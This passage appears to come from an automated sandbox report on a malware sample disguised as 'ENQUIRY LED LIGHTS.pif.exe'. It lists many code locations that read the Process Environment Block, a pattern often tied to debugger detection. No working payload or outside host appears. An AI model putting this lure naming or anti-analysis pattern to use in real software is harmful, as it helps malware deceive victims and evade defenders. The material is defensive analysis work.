            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F4A660 mov eax, dword ptr fs:[00000030h]3_2_02F4A660
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F2C640 mov eax, dword ptr fs:[00000030h]3_2_02F2C640
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F46620 mov eax, dword ptr fs:[00000030h]3_2_02F46620
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F48620 mov eax, dword ptr fs:[00000030h]3_2_02F48620
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F2E627 mov eax, dword ptr fs:[00000030h]3_2_02F2E627
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F1262C mov eax, dword ptr fs:[00000030h]3_2_02F1262C
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F52619 mov eax, dword ptr fs:[00000030h]3_2_02F52619
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F8E609 mov eax, dword ptr fs:[00000030h]3_2_02F8E609
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F2260B mov eax, dword ptr fs:[00000030h]3_2_02F2260B
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F2260B mov eax, dword ptr fs:[00000030h]3_2_02F2260B
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F2260B mov eax, dword ptr fs:[00000030h]3_2_02F2260B
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F2260B mov eax, dword ptr fs:[00000030h]3_2_02F2260B
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F2260B mov eax, dword ptr fs:[00000030h]3_2_02F2260B
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F2260B mov eax, dword ptr fs:[00000030h]3_2_02F2260B
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F2260B mov eax, dword ptr fs:[00000030h]3_2_02F2260B
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F147FB mov eax, dword ptr fs:[00000030h]3_2_02F147FB
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F147FB mov eax, dword ptr fs:[00000030h]3_2_02F147FB
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F9E7E1 mov eax, dword ptr fs:[00000030h]3_2_02F9E7E1
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F327ED mov eax, dword ptr fs:[00000030h]3_2_02F327ED
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F327ED mov eax, dword ptr fs:[00000030h]3_2_02F327ED
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F327ED mov eax, dword ptr fs:[00000030h]3_2_02F327ED
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F1C7C0 mov eax, dword ptr fs:[00000030h]3_2_02F1C7C0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F907C3 mov eax, dword ptr fs:[00000030h]3_2_02F907C3
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FC47A0 mov eax, dword ptr fs:[00000030h]3_2_02FC47A0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F107AF mov eax, dword ptr fs:[00000030h]3_2_02F107AF
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FB678E mov eax, dword ptr fs:[00000030h]3_2_02FB678E
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F18770 mov eax, dword ptr fs:[00000030h]3_2_02F18770
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F20770 mov eax, dword ptr fs:[00000030h]3_2_02F20770
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F20770 mov eax, dword ptr fs:[00000030h]3_2_02F20770
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F20770 mov eax, dword ptr fs:[00000030h]3_2_02F20770
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F20770 mov eax, dword ptr fs:[00000030h]3_2_02F20770
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F20770 mov eax, dword ptr fs:[00000030h]3_2_02F20770
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F20770 mov eax, dword ptr fs:[00000030h]3_2_02F20770
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F20770 mov eax, dword ptr fs:[00000030h]3_2_02F20770
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F20770 mov eax, dword ptr fs:[00000030h]3_2_02F20770
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F20770 mov eax, dword ptr fs:[00000030h]3_2_02F20770
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F20770 mov eax, dword ptr fs:[00000030h]3_2_02F20770
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F20770 mov eax, dword ptr fs:[00000030h]3_2_02F20770
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F20770 mov eax, dword ptr fs:[00000030h]3_2_02F20770
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F10750 mov eax, dword ptr fs:[00000030h]3_2_02F10750
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F9E75D mov eax, dword ptr fs:[00000030h]3_2_02F9E75D
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F52750 mov eax, dword ptr fs:[00000030h]3_2_02F52750
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F52750 mov eax, dword ptr fs:[00000030h]3_2_02F52750
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F94755 mov eax, dword ptr fs:[00000030h]3_2_02F94755
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F4674D mov esi, dword ptr fs:[00000030h]3_2_02F4674D
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F4674D mov eax, dword ptr fs:[00000030h]3_2_02F4674D
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F4674D mov eax, dword ptr fs:[00000030h]3_2_02F4674D
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F4273C mov eax, dword ptr fs:[00000030h]3_2_02F4273C
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F4273C mov ecx, dword ptr fs:[00000030h]3_2_02F4273C
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F4273C mov eax, dword ptr fs:[00000030h]3_2_02F4273C
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F8C730 mov eax, dword ptr fs:[00000030h]3_2_02F8C730
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F4C720 mov eax, dword ptr fs:[00000030h]3_2_02F4C720
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F4C720 mov eax, dword ptr fs:[00000030h]3_2_02F4C720
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F10710 mov eax, dword ptr fs:[00000030h]3_2_02F10710
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F40710 mov eax, dword ptr fs:[00000030h]3_2_02F40710
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F4C700 mov eax, dword ptr fs:[00000030h]3_2_02F4C700
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F104E5 mov ecx, dword ptr fs:[00000030h]3_2_02F104E5
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F444B0 mov ecx, dword ptr fs:[00000030h]3_2_02F444B0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F9A4B0 mov eax, dword ptr fs:[00000030h]3_2_02F9A4B0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F164AB mov eax, dword ptr fs:[00000030h]3_2_02F164AB
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FCA49A mov eax, dword ptr fs:[00000030h]3_2_02FCA49A
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F3A470 mov eax, dword ptr fs:[00000030h]3_2_02F3A470
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F3A470 mov eax, dword ptr fs:[00000030h]3_2_02F3A470
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F3A470 mov eax, dword ptr fs:[00000030h]3_2_02F3A470
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F9C460 mov ecx, dword ptr fs:[00000030h]3_2_02F9C460
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F3245A mov eax, dword ptr fs:[00000030h]3_2_02F3245A
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FCA456 mov eax, dword ptr fs:[00000030h]3_2_02FCA456
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F0645D mov eax, dword ptr fs:[00000030h]3_2_02F0645D
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F4E443 mov eax, dword ptr fs:[00000030h]3_2_02F4E443
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F4E443 mov eax, dword ptr fs:[00000030h]3_2_02F4E443
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F4E443 mov eax, dword ptr fs:[00000030h]3_2_02F4E443
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F4E443 mov eax, dword ptr fs:[00000030h]3_2_02F4E443
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F4E443 mov eax, dword ptr fs:[00000030h]3_2_02F4E443
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F4E443 mov eax, dword ptr fs:[00000030h]3_2_02F4E443
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F4E443 mov eax, dword ptr fs:[00000030h]3_2_02F4E443
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F4E443 mov eax, dword ptr fs:[00000030h]3_2_02F4E443
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F0E420 mov eax, dword ptr fs:[00000030h]3_2_02F0E420
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F0E420 mov eax, dword ptr fs:[00000030h]3_2_02F0E420
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F0E420 mov eax, dword ptr fs:[00000030h]3_2_02F0E420
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F0C427 mov eax, dword ptr fs:[00000030h]3_2_02F0C427
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F96420 mov eax, dword ptr fs:[00000030h]3_2_02F96420
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F96420 mov eax, dword ptr fs:[00000030h]3_2_02F96420
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F96420 mov eax, dword ptr fs:[00000030h]3_2_02F96420
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F96420 mov eax, dword ptr fs:[00000030h]3_2_02F96420
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F96420 mov eax, dword ptr fs:[00000030h]3_2_02F96420
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F96420 mov eax, dword ptr fs:[00000030h]3_2_02F96420
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F96420 mov eax, dword ptr fs:[00000030h]3_2_02F96420
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F48402 mov eax, dword ptr fs:[00000030h]3_2_02F48402
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F48402 mov eax, dword ptr fs:[00000030h]3_2_02F48402
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F48402 mov eax, dword ptr fs:[00000030h]3_2_02F48402
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F125E0 mov eax, dword ptr fs:[00000030h]3_2_02F125E0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F3E5E7 mov eax, dword ptr fs:[00000030h]3_2_02F3E5E7
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F3E5E7 mov eax, dword ptr fs:[00000030h]3_2_02F3E5E7
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F3E5E7 mov eax, dword ptr fs:[00000030h]3_2_02F3E5E7
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F3E5E7 mov eax, dword ptr fs:[00000030h]3_2_02F3E5E7
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F3E5E7 mov eax, dword ptr fs:[00000030h]3_2_02F3E5E7
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F3E5E7 mov eax, dword ptr fs:[00000030h]3_2_02F3E5E7
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F3E5E7 mov eax, dword ptr fs:[00000030h]3_2_02F3E5E7
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F3E5E7 mov eax, dword ptr fs:[00000030h]3_2_02F3E5E7
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F4C5ED mov eax, dword ptr fs:[00000030h]3_2_02F4C5ED
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F4C5ED mov eax, dword ptr fs:[00000030h]3_2_02F4C5ED
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F165D0 mov eax, dword ptr fs:[00000030h]3_2_02F165D0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F4A5D0 mov eax, dword ptr fs:[00000030h]3_2_02F4A5D0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F4A5D0 mov eax, dword ptr fs:[00000030h]3_2_02F4A5D0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F4E5CF mov eax, dword ptr fs:[00000030h]3_2_02F4E5CF
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F4E5CF mov eax, dword ptr fs:[00000030h]3_2_02F4E5CF
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F345B1 mov eax, dword ptr fs:[00000030h]3_2_02F345B1
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F345B1 mov eax, dword ptr fs:[00000030h]3_2_02F345B1
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F905A7 mov eax, dword ptr fs:[00000030h]3_2_02F905A7
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F905A7 mov eax, dword ptr fs:[00000030h]3_2_02F905A7
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F905A7 mov eax, dword ptr fs:[00000030h]3_2_02F905A7
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F4E59C mov eax, dword ptr fs:[00000030h]3_2_02F4E59C
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F12582 mov eax, dword ptr fs:[00000030h]3_2_02F12582
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F12582 mov ecx, dword ptr fs:[00000030h]3_2_02F12582
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F44588 mov eax, dword ptr fs:[00000030h]3_2_02F44588
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F4656A mov eax, dword ptr fs:[00000030h]3_2_02F4656A
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F4656A mov eax, dword ptr fs:[00000030h]3_2_02F4656A
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F4656A mov eax, dword ptr fs:[00000030h]3_2_02F4656A
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F18550 mov eax, dword ptr fs:[00000030h]3_2_02F18550
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F18550 mov eax, dword ptr fs:[00000030h]3_2_02F18550
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F20535 mov eax, dword ptr fs:[00000030h]3_2_02F20535
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F20535 mov eax, dword ptr fs:[00000030h]3_2_02F20535
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F20535 mov eax, dword ptr fs:[00000030h]3_2_02F20535
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F20535 mov eax, dword ptr fs:[00000030h]3_2_02F20535
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F20535 mov eax, dword ptr fs:[00000030h]3_2_02F20535
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F20535 mov eax, dword ptr fs:[00000030h]3_2_02F20535
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F3E53E mov eax, dword ptr fs:[00000030h]3_2_02F3E53E
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F3E53E mov eax, dword ptr fs:[00000030h]3_2_02F3E53E
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F3E53E mov eax, dword ptr fs:[00000030h]3_2_02F3E53E
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F3E53E mov eax, dword ptr fs:[00000030h]3_2_02F3E53E
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F3E53E mov eax, dword ptr fs:[00000030h]3_2_02F3E53E
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FA6500 mov eax, dword ptr fs:[00000030h]3_2_02FA6500
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FE4500 mov eax, dword ptr fs:[00000030h]3_2_02FE4500
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FE4500 mov eax, dword ptr fs:[00000030h]3_2_02FE4500
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FE4500 mov eax, dword ptr fs:[00000030h]3_2_02FE4500
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FE4500 mov eax, dword ptr fs:[00000030h]3_2_02FE4500
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FE4500 mov eax, dword ptr fs:[00000030h]3_2_02FE4500
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FE4500 mov eax, dword ptr fs:[00000030h]3_2_02FE4500
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FE4500 mov eax, dword ptr fs:[00000030h]3_2_02FE4500
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F4AAEE mov eax, dword ptr fs:[00000030h]3_2_02F4AAEE
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F4AAEE mov eax, dword ptr fs:[00000030h]3_2_02F4AAEE
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F10AD0 mov eax, dword ptr fs:[00000030h]3_2_02F10AD0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F44AD0 mov eax, dword ptr fs:[00000030h]3_2_02F44AD0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F44AD0 mov eax, dword ptr fs:[00000030h]3_2_02F44AD0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F66ACC mov eax, dword ptr fs:[00000030h]3_2_02F66ACC
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F66ACC mov eax, dword ptr fs:[00000030h]3_2_02F66ACC
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F66ACC mov eax, dword ptr fs:[00000030h]3_2_02F66ACC
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F18AA0 mov eax, dword ptr fs:[00000030h]3_2_02F18AA0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F18AA0 mov eax, dword ptr fs:[00000030h]3_2_02F18AA0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F66AA4 mov eax, dword ptr fs:[00000030h]3_2_02F66AA4
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F48A90 mov edx, dword ptr fs:[00000030h]3_2_02F48A90
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F1EA80 mov eax, dword ptr fs:[00000030h]3_2_02F1EA80
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F1EA80 mov eax, dword ptr fs:[00000030h]3_2_02F1EA80
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F1EA80 mov eax, dword ptr fs:[00000030h]3_2_02F1EA80
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F1EA80 mov eax, dword ptr fs:[00000030h]3_2_02F1EA80
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F1EA80 mov eax, dword ptr fs:[00000030h]3_2_02F1EA80
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F1EA80 mov eax, dword ptr fs:[00000030h]3_2_02F1EA80
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F1EA80 mov eax, dword ptr fs:[00000030h]3_2_02F1EA80
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F1EA80 mov eax, dword ptr fs:[00000030h]3_2_02F1EA80
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F1EA80 mov eax, dword ptr fs:[00000030h]3_2_02F1EA80
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FE4A80 mov eax, dword ptr fs:[00000030h]3_2_02FE4A80
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F8CA72 mov eax, dword ptr fs:[00000030h]3_2_02F8CA72
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F8CA72 mov eax, dword ptr fs:[00000030h]3_2_02F8CA72
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F4CA6F mov eax, dword ptr fs:[00000030h]3_2_02F4CA6F
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F4CA6F mov eax, dword ptr fs:[00000030h]3_2_02F4CA6F
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F4CA6F mov eax, dword ptr fs:[00000030h]3_2_02F4CA6F
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FBEA60 mov eax, dword ptr fs:[00000030h]3_2_02FBEA60
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F16A50 mov eax, dword ptr fs:[00000030h]3_2_02F16A50
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F16A50 mov eax, dword ptr fs:[00000030h]3_2_02F16A50
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F16A50 mov eax, dword ptr fs:[00000030h]3_2_02F16A50
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F16A50 mov eax, dword ptr fs:[00000030h]3_2_02F16A50
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F16A50 mov eax, dword ptr fs:[00000030h]3_2_02F16A50
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F16A50 mov eax, dword ptr fs:[00000030h]3_2_02F16A50
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F16A50 mov eax, dword ptr fs:[00000030h]3_2_02F16A50
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F20A5B mov eax, dword ptr fs:[00000030h]3_2_02F20A5B
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F20A5B mov eax, dword ptr fs:[00000030h]3_2_02F20A5B
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F34A35 mov eax, dword ptr fs:[00000030h]3_2_02F34A35
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F34A35 mov eax, dword ptr fs:[00000030h]3_2_02F34A35
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F4CA24 mov eax, dword ptr fs:[00000030h]3_2_02F4CA24
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F3EA2E mov eax, dword ptr fs:[00000030h]3_2_02F3EA2E
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F9CA11 mov eax, dword ptr fs:[00000030h]3_2_02F9CA11
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F18BF0 mov eax, dword ptr fs:[00000030h]3_2_02F18BF0
